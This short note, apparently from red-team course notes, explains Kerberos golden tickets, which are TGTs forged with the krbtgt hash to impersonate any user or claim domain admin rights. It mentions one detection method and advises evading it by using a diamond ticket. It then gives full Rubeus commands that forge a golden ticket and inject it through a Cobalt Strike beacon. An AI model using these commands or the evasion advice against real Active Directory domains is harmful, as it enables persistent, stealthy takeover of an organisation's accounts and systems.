A golden ticket is a TGT forged using krbtgt’s password hash (KDC secret key). Golden tickets are very long-lasting since krbtgt’s hash doesn’t automatically change by default. Golden tickets could be forged to impersonate any chosen user or service; they can also claim that a regular user is a domain admin without altering group membership.
Golden tickets could be detected
It is possible to detect golden tickets by looking for a ticket used for TGS-REQ that has no matching AS-REQ. To avoid this detection, generate a diamond ticket instead.
To create a golden ticket using Rubeus:
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:[krbtgt-hash-base64] /user:[target-user] /domain:[domain-fqdn] /sid:[domain-sid] /nowrapTo use this ticket:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[target-user] /password:[does-not-matter] /ticket:[ticket-base64]